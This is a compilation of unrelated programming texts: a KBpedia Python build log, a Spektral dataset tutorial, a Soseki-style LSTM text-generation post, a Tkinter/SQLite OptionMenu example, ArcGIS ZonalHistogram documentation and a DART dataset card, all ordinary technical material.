This is a good example of a bulk move with a spreadsheet (see CWPK #36). Since there are fields such as alternative labels or definitions for which hyphens or dashes are fine, we do not want to do a global search-and-replace for underscores. Using the spreadsheet, the answer is to highlight the columns of interest (while using the menu-based search and replace) and only replace within the highlighted selection. If you make a mistake, Undo.
At the same time, I typically assign a name to the major block on the spreadsheet and then sort on various fields (columns) to check for things like open entries, strange characters (that often appear at the top or bottom of sorts), fields that improperly split in earlier steps (look for long ones), or other patterns to which your eye rapidly finds. If I EVER find an error, I try to fix it right then and there. It slows first iterations, but, over time, always fixing problems as discovered leads to cleaner and cleaner inputs.
Starting with the initial class backbone file (Generals_struct_out.csv) and routine (class_struct_builder), after getting the setting configurations set, I begin the run. It fails. This is actually to be expected, since it is an occasion worthy of celebration when a given large routine runs to completion without error on its first try!
On failures, one of the nice things about Python is a helpful ‘traceback’ on where the error occurred. Since we are processing tens of thousands of items at this class build point, we need to pinpoint in the code where the fail was occurring and add some print statements, especially ones that repeat to screen what items are currently going through the processing loop at the point of fail. Then, when you run again, you can see where in your input file the error likely occurs. Then, go back to the input file, and make the correction there.
Depending on the scope of your prior changes, these start-and-stop iterations of run-fail-inspect-correct may occur multiple times. You will eventually work your way through the input file if you are unlucky. But, you perhaps may not even notice any of this if you are lucky! (Of course, these matters are really not so much a matter of luck, since outcomes are improved by attention to detail.)
After a couple of iterations of minor corrections, first the classes and then the properties load properly with all sub- relationships intact. Pretty cool! I can smell the finish line.
In the shift to annotations, I basically wanted to load what had previously been tested and ingested without problems, and then concentrate on the new areas. The class annotation uploads went smoothly (only one hiccup for a mis-labeled resource). Great, so I can now take a quick detour to get rid of the superfluous links to OCyc (3) before facing the final step of bringing in the property annotations.
Another Cleaning Task
Before we can complete the third of our build steps involving the class_annot_builder function, we set for ourselves the removal of the open-source Cyc (OCyc) internal links in definitions. These all have the form of:
<a href="http://sw.opencyc.org/concept/Mx4rvVjk55wpEbGdrcN5Y29ycA">IndependentCountry</a>
My desire is to remove all of the href link markup, but leave the label text between the <\a\> tags. I know I can use regular expressions to recognize a sub-string like the above, but I am no more than a toddler when it comes to formulating regex. Like many other areas in Python, I begin a search for modules that may make this task a bit easier.
I soon discovered there are multiple approaches, and my quick diligence suggests either the beautifulsoup or bleach modules may be best suited. I make the task slightly more complicated by wanting to limit the removal to OCyc links only, and to leave all other href’s.
I chose beautifulsoup because it is a widely used and respected library for Web scraping and many data processing tasks. I also realized this was a one-off occasion, so while I did write a routine, I chose not to include it in the utils module. I also excised the ‘definitions’ column from our input files, made the changes to it, and then uploaded the changes. In this manner, I was able to sidestep some of the general file manipulation requirements that a more commonly used utility would demand. Here is the resulting code:
import csv
from bs4 import BeautifulSoup  # Part of the Anaconda distro

in_file = 'C:/1-PythonProjects/kbpedia/v300/build_ins/working/def_old.csv'
out_file = 'C:/1-PythonProjects/kbpedia/v300/build_ins/working/def_new.csv'
output = open(out_file, 'w+', encoding='utf8', newline='')
x = 0
with open(in_file, 'r', encoding='utf8') as f:
    reader = csv.reader(f)
    for row in reader:
        line = str(row)
        soup = BeautifulSoup(line)                                # You can feed bs4 with lines, docs, etc.
        tags = soup.select('a[href^="http://sw.opencyc.org/"]')   # The key for selecting out the OCyc stuff
        if tags != []:
            for item in tags:                                     # Some entries have no tags, others a few
                item.unwrap()                                     # The main method for getting the text within tags
            item_text = soup.get_text()                           # The text after tags removed
        else:
            item_text = line
        item_text = item_text.replace("['", "")                   # A bunch of 'hacky' cleanup of the output
        item_text = item_text.replace("']", "")
        item_text = item_text.replace('["', '')
        item_text = item_text.replace('"]', '')
        item_text = item_text.replace("', '", ",")
        print(item_text)
        print(item_text, file=output)
        x = x + 1
print(x, 'total items processed.')
output.close()
print('Definition modifications are complete.')
Figuring out this routine took more time than I planned. Part of the reason is that the ‘definitions’ in KBpedia are the longest and most complicated strings, with many clauses and formatting and quoted sections. So I had quoting conflicts that caused some of the 58 K entries to skip or combine with other lines. I wanted to make sure the correspondence was kept accurate. Another issue was figuring out the exact beautifulsoup syntax for identifying the specific OCyc links (with variable internal references) and extracting out the internal text for the link.
Nonetheless, beautifulsoup is a powerful utility, and I am glad I spent some time learning how to get to first twitch with it.
Updates to Domain and Range
Since the earlier version (2.50) of KBpedia did not have proper loads of domain and range, once I re-established those specifications I foresaw that ingest of these fields might be a problem. The reasons for this supposition are the variety of data types that one might encounter, plus we were dealing with object and data properties, which have a bit more structure and stronger semantics, as well as annotations, which pose different issues in language checks and longer strings.
I was not surprised, then, when this step proved to be the most challenging of the update.
First, indeed, there were more domain and range options, as this revised routine indicates (compare to the smaller version in CWPK #47):
### KEY CONFIG SETTINGS (see build_deck in config.py) ###
# 'kb_src' : 'standard'
# 'loop_list' : file_dict.values(), # see 'in_file'
# 'loop' : 'property_loop',
# 'in_file' : 'C:/1-PythonProjects/kbpedia/v300/build_ins/properties/prop_annot_out.csv',
# 'out_file' : 'C:/1-PythonProjects/kbpedia/v300/target/ontologies/kbpedia_reference_concepts.csv',
def prop_annot_build(**build_deck):
print('Beginning KBpedia property annotation build . . .')
xsd = kb.get_namespace('http://w3.org/2001/XMLSchema#')
wgs84 = kb.get_namespace('http://www.opengis.net/def/crs/OGC/1.3/CRS84')
loop_list = build_deck.get('loop_list')
loop = build_deck.get('loop')
out_file = build_deck.get('out_file')
x = 1
if loop != 'property_loop':
print("Needs to be a 'property_loop'; returning program.")
return
for loopval in loop_list:
print(' . . . processing', loopval)
in_file = loopval
with open(in_file, 'r', encoding='utf8') as input:
is_first_row = True
reader = csv.DictReader(input, delimiter=',', fieldnames=['id', 'prefLabel', 'subPropertyOf', 'domain',
'range', 'functional', 'altLabel', 'definition', 'editorialNote'])
for row in reader:
r_id = row['id']
r_pref = row['prefLabel']
r_dom = row['domain']
r_rng = row['range']
r_alt = row['altLabel']
r_def = row['definition']
r_note = row['editorialNote']
r_id = r_id.replace('rc.', '')
id = getattr(rc, r_id)
if id == None:
continue
if is_first_row:
is_first_row = False
continue
id.prefLabel.append(r_pref)
i_dom = r_dom.split('||')
if i_dom != ['']:
for item in i_dom: # We need to accommodate different namespaces
if 'kko.' in item:
item = item.replace('kko.', '')
item = getattr(kko, item)
id.domain.append(item)
elif 'owl.' in item:
item = item.replace('owl.', '')
item = getattr(owl, item)
id.domain.append(item)
elif item == ['']:
continue
elif item != '':
item = getattr(rc, item)
if item == None:
continue
else:
id.domain.append(item)
else:
print('No domain assignment:', 'Item no:', x, item)
continue
if 'owl.' in r_rng: # A tremendous number of range options
r_rng = r_rng.replace('owl.', '') # xsd datatypes are only partially supported
r_rng = getattr(owl, r_rng)
id.range.append(r_rng)
elif 'string' in r_rng:
id.range = [str]
elif 'decimal' in r_rng:
id.range = [float]
elif 'anyuri' in r_rng:
id.range = [normstr]
elif 'boolean' in r_rng:
id.range = [bool]
elif 'datetime' in r_rng:
id.range = [datetime.datetime]
elif 'date' in r_rng:
id.range = [datetime.date]
elif 'time' in r_rng:
id.range = [datetime.time]
elif 'wgs84.' in r_rng:
r_rng = r_rng.replace('wgs84.', '')
r_rng = getattr(wgs84, r_rng)
id.range.append(r_rng)
elif r_rng == ['']:
print('r_rng = empty:', r_rng)
else:
print('r_rng = else:', r_rng, id)
# id.range.append(r_rng)
i_alt = r_alt.split('||')
if i_alt != ['']:
for item in i_alt:
id.altLabel.append(item)
id.definition.append(r_def)
i_note = r_note.split('||')
if i_note != ['']:
for item in i_note:
id.editorialNote.append(item)
x = x + 1
kb.save(out_file, format="rdfxml")
print('KBpedia property annotation build is complete.')
Second, a number of the range types — xsd.anyURI, xsd.hexBinary, and wgs84 — are not supported internally by owlready2, and there is no facility to add them directly to the system. I have made outreach to the responsive developer of owlready2, Jean-Baptiste Lamy, to see whether we can fill this gap before we go live with KBpedia v. 300. (Update: Within two weeks, Jean-Baptiste responded with a fix and new definition capabilities.) Meanwhile, there are relatively few instances of this gap, so we are in pretty good shape to move forward as is. Only a handful of resources are affected by these gaps, out of a total of 58 K.
URI Changes
The changing of an identifier for a knowledge graph resource is not encouraged. Most semantic technology advice is simply to pick permanent or persistent URIs. There is thus little discussion or guidance as to what is best practice when an individual resource ID does need to change. Our change from hyphens to underscores
(1) is one such example of when an ID needs to change.
The best point of intervention is at the Web server, since our premise for knowledge graphs is Web-accessible information obtained via (generally) HTTP. While we could provide internal knowledge graph representations to capture the mapping between old and new URIs, an external request in the old form still needs to get a completion response for the new form. The best way to achieve that is via content negotiation by the server.
Under circumstances where prior versions of your knowledge graph were in broad use, the recommended approach would be to follow the guidelines of the W3C (the standards-setting body for semantic technologies) for how to publish a semantic Web vocabulary. This guidance is further supplemented with recipes for how to publish linked data under the rubric of ‘cool URIs‘. Following these guidances is much easier than updating URIs in place.
However, because of decisions yet to be documented to not implement linked data (see CWPK #60 when it is published in about three weeks), the approach we will be taking is much simpler. We will generate a mapping (correspondence) file between the older, retired URIs (the ones with the hyphens) with the new URIs (the ones with the underscores). We will announce this correspondence file at time of v 300 release, which we have earmarked to occur at the conclusion of this CWPK series. The responsibility for URI updates, if needed, will be placed on existing KBpedia users. This decision violates the recommended best practice of never changing URIs, but we deem it manageable based on our current user base and their willingness to make those modifications directly. Posting this correspondence fill will be one of the last steps before KBpedia v 300 goes fully ‘live’.
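A minimal sketch of how such a correspondence file might be generated with Python's csv module (the file names here are hypothetical; any listing of the old, hyphenated identifiers will do):
import csv

in_file = 'C:/1-PythonProjects/kbpedia/v300/build_ins/working/old_ids.csv'       # hypothetical
out_file = 'C:/1-PythonProjects/kbpedia/v300/build_ins/working/uri_mapping.csv'  # hypothetical

with open(in_file, 'r', encoding='utf8') as f_in, \
     open(out_file, 'w', encoding='utf8', newline='') as f_out:
    writer = csv.writer(f_out)
    writer.writerow(['old_uri', 'new_uri'])
    for row in csv.reader(f_in):
        old_id = row[0]
        # the only change between the two URI forms is hyphen -> underscore in the identifier
        writer.writerow([old_id, old_id.replace('-', '_')])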
So, we completed the full build, but kept a copy of the one-step-last-removed to return to if (when) we get a better processing of range.
The effort was greater than I anticipated. Actual processing time for a full re-build across all steps was about 90 min. There was perhaps another 8-12 hrs in working through developing the code and solving (or mostly so) the edge cases.
This is the first time I have done this re-build process with Python, but it is a process I have used and learned to improve for nearly a decade. I’m pretty pleased about the build process itself, but am absolutely thrilled with the learning that has taken place to give me tools at-hand. I’m feeling really positive about how this CWPK series is unfolding.
Part IV Conclusion
This brings to a close Part IV in our CWPK series. When I first laid out the plan for this series, I told myself that eventual public release of the series and its installments depended on being able to fully ’roundtrip’ KBpedia. I was somewhat confident setting out that this milestone could be achieved. Today, I know it to be so, and so now can begin the next steps of releasing the installments and their accompanying Jupyter Notebook pages. Successfully achieving the roundtrip milestone in this objective means we began to publish the start of our CWPK series on July 27, 2020. Woohoo!
In terms of the overall plan, we are about 2/3 of the way through the entire anticipated series. We next tackle the remaining steps in completing a full, public release of the knowledge graph. Then, we use the completed KBpedia v 300 to put the knowledge graph through its paces, doing some analysis, some graphing, and some machine learning. As of this moment in time, we have a target of 75 total installments in this Cooking with Python and KBpedia series, which we hope to wrap up by mid-November or so. Please keep with us for the journey!
|
Creating a Custom Dataset
The Dataset class is a new feature of Spektral 1.0 that standardizes how graph datasets are represented in Spektral.
In this tutorial, we'll go over a simple example to create a custom dataset with your data.
This is also useful if you want to share your datasets publicly or include them as part of Spektral.
Essential information
You create a dataset by subclassing the spektral.data.Dataset class.
The core of datasets is the read() method. This is called at every instantiation of the dataset and must return a list of spektral.data.Graph. It doesn't matter if you read the data from a file or create it on the fly; this is where the dataset is loaded in memory.
All datasets have a path property that represents the directory in which the data is stored. This defaults to ~/.spektral/datasets/[ClassName]. You can ignore it if you want.
However, each time you instantiate a Dataset it will check whether path exists. If it doesn't, the download() method will be called.
You can use download() to define any additional operations that are needed to save your raw data to disk. The method will be called before read().
Both read() and download() are called by the dataset's __init__() method. If you need to override the initialization of your dataset, make sure to call super().__init__() somewhere in your implementation (usually as the last line).
Example
This is a simple example that shows how to create a custom dataset with five random graphs. We pretend that the data comes from an online source so that we can show how to use download().
We start by overriding the __init__() method to store some custom parameters of the dataset:
import os
import numpy as np
from numpy.random import rand, randint
from spektral.data import Dataset, Graph

class MyDataset(Dataset):
    """
    A dataset of five random graphs.
    """
    def __init__(self, nodes, feats, **kwargs):
        self.nodes = nodes
        self.feats = feats
        super().__init__(**kwargs)
Remember to call super().__init__(**kwargs) as the last line.
Then, we simulate downloading the data from the web. Since this method gets called if path does not exist on the system, it makes sense to create the corresponding directory now:
def download(self):
data = ... # Download from somewhere
# Create the directory
os.mkdir(self.path)
# Write the data to file
for i in range(5):
x = rand(self.nodes, self.feats)
a = randint(0, 2, (self.nodes, self.nodes))
y = randint(0, 2)
filename = os.path.join(self.path, f'graph_{i}')
np.savez(filename, x=x, a=a, y=y)
Finally, we implement the read() method to return a list of Graph objects:
def read(self):
# We must return a list of Graph objects
output = []
for i in range(5):
data = np.load(os.path.join(self.path, f'graph_{i}.npz'))
output.append(
Graph(x=data['x'], a=data['a'], y=data['y'])
)
return output
We can now instantiate our dataset, which will "download" our data and read it into memory:
>>> dataset = MyDataset(3, 2)
>>> dataset
MyDataset(n_graphs=5)
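Individual graphs can be inspected by indexing the dataset; the shapes below follow from the nodes=3, feats=2 arguments passed above (a small sketch, assuming the MyDataset class defined in this tutorial):
graph = dataset[0]        # a spektral.data.Graph
print(len(dataset))       # 5 graphs in total
print(graph.x.shape)      # (3, 2) node features
print(graph.a.shape)      # (3, 3) adjacency matrix
print(graph.y)            # the graph label (0 or 1)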
We can see that our graphs were saved to file:
$ ls ~/.spektral/datasets/MyDataset/
graph_0.npz graph_1.npz graph_2.npz graph_3.npz graph_4.npz
so the next time we create MyDataset it will read from the files we have saved.
Remember that, if you want, you're free to store your data as you prefer. Datasets in Spektral are just there to simplify your workflow, but the library is still designed according to Keras' principle of not getting in your way. If you want to manipulate your data differently, your GNNs will still work.
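For instance, a dataset built this way can be handed to one of Spektral's data loaders when training a GNN. The following is a minimal sketch, assuming the DisjointLoader class exported by spektral.data:
from spektral.data import DisjointLoader

loader = DisjointLoader(dataset, batch_size=2, epochs=1)
inputs, target = next(iter(loader.load()))   # one mini-batch of disjoint graphs
# A Keras model could then be trained with:
# model.fit(loader.load(), steps_per_epoch=loader.steps_per_epoch)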
You can also see this script for another example on how to create and use a custom dataset.
|
I want to generate text automatically with deep learning!
Nice to meet you, I'm いとぅー (@andmohiko), a trainee at Aidemy.
Automatic text generation is a classic theme in natural language processing.
This time, I'll try to automatically generate text in the style of Natsume Soseki.
Method
We use an LSTM-RNN.
For more details about LSTM, see here.
To explain briefly, text is generated by endlessly repeating one step: predicting the next single character from a string of a given length.
A Markov chain only looks at the previous two characters, so using an LSTM has the advantage that the generated text is more likely to follow the context.
Dataset
We use Natsume Soseki's "Botchan", "Wagahai wa Neko de Aru" (I Am a Cat), "Kokoro", and "Yume Juya" (Ten Nights of Dreams), as published on Aozora Bunko.
Here → List of works by author: Natsume Soseki
Collecting data for natural language processing is hard work, so having these freely available is much appreciated.
Preprocessing
The downloaded texts contain ruby (furigana) readings, annotations, and other markup, so we remove these and keep only the body text.
import sys
import re

paths = ["bocchan.txt", "kokoro.txt", "wagahaiwa_nekodearu.txt", "yume_juya.txt"]

for path in paths:
    bindata = open("./" + path, "rb")
    lines = bindata.readlines()
    for line in lines:
        text = line.decode('Shift_JIS')       # Aozora Bunko files are Shift_JIS encoded
        text = re.split(r'\r', text)[0]       # drop the carriage return and anything after it
        text = re.split(r'底本', text)[0]      # cut the line at the colophon ("source text") marker
        text = text.replace('|', '')          # remove the ruby base-text delimiter
        text = re.sub(r'《.+?》', '', text)    # remove ruby (furigana) readings
        text = re.sub(r'［＃.+?］', '', text)  # remove editorial annotations in full-width brackets
        #print(text)
        with open('./data_' + path, 'a', encoding='utf-8') as f:
            f.write(text + '\n')
We do this for each of the Soseki works, and finally join the four cleaned texts into one long text file.
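The training script below reads a single file named ./data_souseki.txt, which the code above does not create. A minimal sketch of the concatenation step (assuming the data_*.txt files produced above) might look like this:
# Sketch: concatenate the cleaned files into the single training file
# expected by the script below (file names are the ones used above).
paths = ["bocchan.txt", "kokoro.txt", "wagahaiwa_nekodearu.txt", "yume_juya.txt"]
with open("./data_souseki.txt", "w", encoding="utf-8") as out:
    for path in paths:
        with open("./data_" + path, encoding="utf-8") as f:
            out.write(f.read())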
Implementing the LSTM with TensorFlow + Keras
Now we finally implement the model. We use Keras, with TensorFlow doing the heavy lifting behind the scenes.
from keras.models import Sequential,load_model
from keras.layers import Dense, Activation, LSTM
from keras.optimizers import RMSprop
from keras.utils.data_utils import get_file
import numpy as np
import random
import sys
path = "./data_souseki.txt"
bindata = open(path, "rb").read()
text = bindata.decode("utf-8")
print("Size of text: ",len(text))
chars = sorted(list(set(text)))
print("Total chars :",len(chars))
# Build dictionaries mapping characters to indices and back
char_indices = dict((c,i) for i,c in enumerate(chars))
indices_char = dict((i,c) for i,c in enumerate(chars))
# Learn the next character after a 40-character window; slide by 3 characters to build (40 chars -> 1 char) training pairs
maxlen = 40
step = 3
sentences = []
next_chars = []
for i in range(0, len(text)-maxlen, step):
sentences.append(text[i:i+maxlen])
next_chars.append(text[i+maxlen])
# Vectorize the text
X = np.zeros((len(sentences), maxlen, len(chars)), dtype=np.bool)
y = np.zeros((len(sentences), len(chars)), dtype=np.bool)
for i, sentence in enumerate(sentences):
    for t, char in enumerate(sentence):
        X[i, t, char_indices[char]] = 1
    y[i, char_indices[next_chars[i]]] = 1
# Build a model using an LSTM
model = Sequential()  # handles sequential data
model.add(LSTM(128, input_shape=(maxlen,len(chars))))
model.add(Dense(len(chars)))
model.add(Activation("softmax"))
optimizer = RMSprop(lr = 0.01)
model.compile(loss="categorical_crossentropy",optimizer=optimizer)
def sample(preds, temperature=1.0):
preds = np.asarray(preds).astype("float64")
preds = np.log(preds) / temperature
exp_preds = np.exp(preds)
preds = exp_preds / np.sum(exp_preds)
probs = np.random.multinomial(1, preds, 1)
return np.argmax(probs)
# Train and generate text
for iteration in range(1,30):
print()
print("-"*50)
print("繰り返し回数: ",iteration)
model.fit(X, y, batch_size=128, epochs=1)
start_index = random.randint(0, len(text)-maxlen-1)
for diversity in [0.2, 0.5, 1.0, 1.2]:
print()
print("-----diversity", diversity)
generated =""
sentence = text[start_index: start_index + maxlen ]
generated += sentence
print("-----Seedを生成しました: " + sentence + '"')
sys.stdout.write(generated)
        # Predict the next character and append it
for i in range(400):
x = np.zeros((1,maxlen,len(chars)))
for t,char in enumerate(sentence):
x[0, t, char_indices[char]] = 1
            preds = model.predict(x, verbose=0)[0]  # predict the next character
next_index = sample(preds, diversity)
next_char = indices_char[next_index]
generated += next_char
sentence = sentence[1:] + next_char
sys.stdout.write(next_char)
sys.stdout.flush()
print()
model.save('souseki_model.h5')
file = open('sousekigentext.txt','w+',encoding='utf-8').write(generated)
Because the dataset is large, training can take a whole day without a GPU. Leave it running for a while.
Training progress
Due to time constraints, the number of epochs is set to 30 this time.
Iteration 1, loss: 4.1994
申しょいを少しも充に落ちる語ったかど勢だ」「いらせんと従ょいに詩に至った文考を逢ってかかり方でいし出である武び少しドャ大椀屋に見て、這入ったが内にステ動りら間」「人のく迷亭はかあした共安である。あるむを御当坊の起粧にな通ったの云き返す小ッちにも通ろ首の朝な性に学者口を高「え最がつけない」「すん、毫は食うんだ流山主人はレ一の子口学者は奥ずや。あ昔威横あが、しいくオあした 活で、学種爺とにこの作団だからパ気と云いえ面を見た。
I can't read this at all...
Iteration 27
loss: 3.3512
大きな声を第一のはなかったから、それだから、どうかした事がない。その時の方だからしきりになっている事はないが、これからその事だから、自分でも、そのそとでない。吾輩は人間になると、吾輩には文明のごとくのはない。一るのは一際もなくなる。それなら飛び出して来たものがて来たのだが、またはなかったが、それではあいまさに、云わぬが、なるほどのところがある。ただ一人がいい。
Results and future work
We managed to generate text that feels somewhat like Natsume Soseki. Watching the output gradually become more Japanese-like over the course of training was fun.
The loss did not get as low as expected, so next time I would like to bring it down further. Even at iteration 27 the output does not really hold together as meaningful Japanese, which leaves it just short of the goal; with a lower loss, the text would likely become more coherent Japanese.
This time we generated text by predicting one character at a time, but I think splitting the text into words and predicting one word at a time would produce more natural-sounding Japanese. Also, to evaluate how "Soseki-like" the output is, we could prepare several candidate texts and survey people on which one came from the model trained on Soseki's novels, which would give a more objective evaluation.
|
Create a list by using data from SQLite student table
Create an OptionMenu by using the elements of the list to display the options
query="SELECT distinct(class) as class FROM student"
Getting records
query="SELECT distinct(class) as class FROM student"
r_set = my_conn.execute(query)
my_list = [r for r, in r_set] # create a list
Next, we create the Tkinter window.
import tkinter as tk
my_w = tk.Tk()
my_w.geometry("250x200") # Size of the window
my_w.title("www.plus2net.com") # Adding a title
We will create a StringVar() and set the default value for the OptionMenu.
options = tk.StringVar(my_w)
options.set(my_list[0]) # default value
Set the optionMenu and add the option values
om1 =tk.OptionMenu(my_w, options, *my_list)
om1.grid(row=2,column=5)
my_w.mainloop()
Full code is here
import sqlite3
my_conn = sqlite3.connect('my_db.db')
###### end of connection ####
query="SELECT distinct(class) as class FROM student"
r_set = my_conn.execute(query)
my_list = [r for r, in r_set] # create a list
import tkinter as tk
my_w = tk.Tk()
my_w.geometry("250x200") # Size of the window
my_w.title("www.plus2net.com") # Adding a title
options = tk.StringVar(my_w)
options.set(my_list[0]) # default value
om1 =tk.OptionMenu(my_w, options, *my_list)
om1.grid(row=2,column=5)
my_w.mainloop()
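To react when the user picks a different class, the OptionMenu's command option can be used. This is a small sketch that reuses the my_w, options, and my_list objects created above; the callback name is illustrative.
def my_upd(value):  # OptionMenu passes the newly selected value to the callback
    print("Selected class:", value)

om1 = tk.OptionMenu(my_w, options, *my_list, command=my_upd)
om1.grid(row=2, column=5)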
|
Available with Spatial Analyst license.
Summary
Creates a table and a histogram graph that show the frequency distribution of cell values on the Value input for each unique Zone.
Usage
A zonal histogram enables you to investigate the frequency distribution of values in one dataset within classes of another dataset. Examples include slope distribution within land use classes, rainfall distribution within elevation classes, or crime distribution by police beat.
A zone is defined as all areas in the input that have the same value. The areas do not have to be contiguous. Both raster and feature can be used for the zone input.
When the cell sizes of the Input raster or feature zone data (in_zone_data in Python) and the Input value raster (in_value_raster in Python) are different, the output cell size will be the Maximum Of Inputs, and the Input value raster will be used as the snap raster internally. If the cell size is the same, but the cells are not aligned, the Input value raster will be used as the snap raster internally. Either of these cases will trigger an internal resampling before the zonal operation is performed.
When the zone and value inputs are both rasters of the same cell size and the cells are aligned, they will be used directly in the tool, and will not be resampled internally during the tool execution.
If the Input raster or feature zone data (in_zone_data in Python) is a raster, it must be an integer raster.
If the Input raster or feature zone data (in_zone_data in Python) is a feature, it will be converted to a raster internally, using the cell size and cell alignment from the Input value raster (in_value_raster in Python).
If the Input raster or feature zone data (in_zone_data in Python) is a point feature, it is possible to have more than one point contained within any particular cell of the value input raster. For such cells, the zone value is determined by the point with the lowest ObjectID field (for example, OID or FID).
If the Input raster or feature zone data (in_zone_data in Python) has overlapping polygons, the zonal analysis will not be performed for each individual polygon. Since the feature input is converted to a raster, each location can only have one value.
An alternative method is to process the zonal operation iteratively for each of the polygon zones and collate the results.
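A rough sketch of that iterative approach is shown below; the paths, layer name, and per-zone output naming are illustrative assumptions, not part of the tool's documentation.
# Sketch: run ZonalHistogram once per (possibly overlapping) polygon zone.
import arcpy
from arcpy.sa import ZonalHistogram

arcpy.CheckOutExtension("Spatial")
zones = "C:/sapyexamples/data/overlapping_zones.shp"
valueRaster = "C:/sapyexamples/data/valueras"

arcpy.MakeFeatureLayer_management(zones, "zone_lyr")
oidField = arcpy.Describe(zones).OIDFieldName
with arcpy.da.SearchCursor(zones, [oidField]) as cursor:
    for (oid,) in cursor:
        # Select a single polygon and treat it as its own zone dataset
        arcpy.SelectLayerByAttribute_management(
            "zone_lyr", "NEW_SELECTION", "{0} = {1}".format(oidField, oid))
        ZonalHistogram("zone_lyr", oidField, valueRaster,
                       "C:/sapyexamples/output/znhist_{0}.dbf".format(oid))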
The Zone field (zone_field in Python) must be either integer or text type.
When specifying the Input raster or feature zone data (in_zone_data in Python), the default zone field will be the first available integer or text field. If no other valid fields exist, the ObjectID field (for example, OID or FID) will be the default.
In the histogram graph, the number of classes (bins) for each zone is determined by the Input value raster.
If a layer is specified, then the layer's symbology defines the number of classes.
If a dataset is specified, by default there will be 256 classes, unless the input is an integer raster with fewer than 26 unique values, in which case the number of classes will be the total count of unique values.
A zonal histogram graph is not generated by default. To have it be created when the tool is run, specify the Output graph name.
The graph is temporary (in-memory) only. To make a permanent version of it, use the Save Graph tool to create a .grf graph file, or one of the other output formats available in that tool.
See Analysis environments and Spatial Analyst for additional details on the geoprocessing environments that apply to this tool.
Syntax
ZonalHistogram(in_zone_data, zone_field, in_value_raster, out_table, {out_graph})
Parameter, explanation, and data type:
in_zone_data
Dataset that defines the zones.
The zones can be defined by an integer raster or a feature layer.
Data type: Raster Layer; Feature Layer
zone_field
Field that holds the values that define each zone.
It can be an integer or a string field of the zone dataset.
Data type: Field
in_value_raster
The raster values to create the histograms.
Data type: Raster Layer
out_table
The output table file.
The format of the table is determined by the output location and path. By default, the output will be a geodatabase table. If the path is not in a geodatabase, the format is determined by the extension. If the extension is .dbf, it will be in dBASE format. If no extension is specified, the output will be an INFO table.
The optional graph output is created from the information in the table.
Data type: Table
out_graph (Optional)
The name of the output graph for display.
The graph is temporary. To persist it, use the Save Graph tool.
Data type: Graph
Code sample
ZonalHistogram example 1 (Python window)
This example creates a zonal histogram .dbf table.
import arcpy
from arcpy import env
from arcpy.sa import *
env.workspace = "C:/sapyexamples/data"
outZonHisto = ZonalHistogram("zoneras", "zonfield", "valueras", "znhist_tbl.dbf")
ZonalHistogram example 2 (stand-alone script)
This example creates a zonal histogram .dbf table and a graph file.
# Name: ZonalHistogram_Ex_02.py
# Description: Creates a zonal histogram output table and
#              a graph showing the amount of value cells
#              for each unique input zone.
# Requirements: Spatial Analyst Extension

# Import system modules
import arcpy
from arcpy import env
from arcpy.sa import *

# Set environment settings
env.workspace = "C:/sapyexamples/data"

# Set local variables
inZoneData = "zonras"
zoneField = "zonfield"
inValueRaster = "valueras"
outTable = "C:/sapyexamples/output/zonehist_tbl.dbf"
outGraph = "zonehist_gra"

# Check out the ArcGIS Spatial Analyst extension license
arcpy.CheckOutExtension("Spatial")

# Execute ZonalHistogram
ZonalHistogram(inZoneData, zoneField, inValueRaster, outTable, outGraph)
Environments
Licensing information
Basic: Requires Spatial Analyst
Standard: Requires Spatial Analyst
Advanced: Requires Spatial Analyst
|
Dataset Card Creation Guide
Table of Contents
Dataset Description
Dataset Structure
Dataset Creation
Considerations for Using the Data
Additional Information
Dataset Description
Dataset Summary
DART is a large dataset for open-domain structured data record to text generation. We consider the structured data record input as a set of RDF entity-relation triples, a format widely used for knowledge representation and semantics description. DART consists of 82,191 examples across different domains with each input being a semantic RDF triple set derived from data records in tables and the tree ontology of the schema, annotated with sentence descriptions that cover all facts in the triple set. This hierarchical, structured format with its open-domain nature differentiates DART from other existing table-to-text corpora.
Supported Tasks and Leaderboards
The task associated to DART is text generation from data records that are RDF triplets:
conditional-text-generation-other-rdf-to-text: The dataset can be used to train a model for text generation from RDF triplets, which consists of generating a textual description of structured data. Success on this task is typically measured by achieving a high BLEU, METEOR, BLEURT, TER, MoverScore, and BERTScore. The BART-large model currently achieves the following scores:
BLEU METEOR TER MoverScore BERTScore BLEURT
BART 37.06 0.36 0.57 0.44 0.92 0.22
This task has an active leaderboard, which can be found here and ranks models based on the above metrics.
Languages
The dataset is in English (en).
Dataset Structure
Data Instances
Here is an example from the dataset:
{'annotations': {'source': ['WikiTableQuestions_mturk'],
'text': ['First Clearing\tbased on Callicoon, New York and location at On NYS 52 1 Mi. Youngsville']},
'subtree_was_extended': False,
'tripleset': [['First Clearing', 'LOCATION', 'On NYS 52 1 Mi. Youngsville'],
['On NYS 52 1 Mi. Youngsville', 'CITY_OR_TOWN', 'Callicoon, New York']]}
It contains one annotation where the textual description is 'First Clearing\tbased on Callicoon, New York and location at On NYS 52 1 Mi. Youngsville'. The RDF triplets considered to generate this description are in tripleset and are formatted as subject, predicate, object.
Data Fields
The different fields are:
annotations:
text: list of text descriptions of the triplets
source: list of sources of the RDF triplets (WikiTable, e2e, etc.)
subtree_was_extended: boolean, whether the subtree considered during dataset construction was extended. Sometimes this field is missing, and is therefore set to None
tripleset: RDF triplets as a list of triplets of strings (subject, predicate, object)
Data Splits
There are three splits, train, validation and test:
Train Valid Test
N. Examples 30526 2768 6959
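If the dataset has been published on the Hugging Face Hub, the splits can be inspected with the datasets library; the snippet below is a sketch that assumes the hub id is "dart":
from datasets import load_dataset

dart = load_dataset("dart")              # assumes the dataset id "dart"
print(dart)                              # DatasetDict with train/validation/test splits
example = dart["train"][0]
print(example["tripleset"])              # list of [subject, predicate, object] triples
print(example["annotations"]["text"])    # sentence description(s) covering the triples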
Dataset Creation
Curation Rationale
Automatically generating textual descriptions from structured data inputs is crucial to improving the accessibility of knowledge bases to lay users.
Source Data
DART comes from existing datasets that cover a variety of different domains while allowing to build a tree ontology and form RDF triple sets as semantic representations. The datasets used are WikiTableQuestions, WikiSQL, WebNLG and Cleaned E2E.
Initial Data Collection and Normalization
DART is constructed using multiple complementary methods: (1) human annotation on open-domain Wikipedia tables from WikiTableQuestions (Pasupat and Liang, 2015) and WikiSQL (Zhong et al., 2017), (2) automatic conversion of questions in WikiSQL to declarative sentences, and (3) incorporation of existing datasets including WebNLG 2017 (Gardent et al., 2017a,b; Shimorina and Gardent, 2018) and Cleaned E2E (Novikova et al., 2017b; Dušek et al., 2018, 2019)
Who are the source language producers?
[More Information Needed]
Annotations
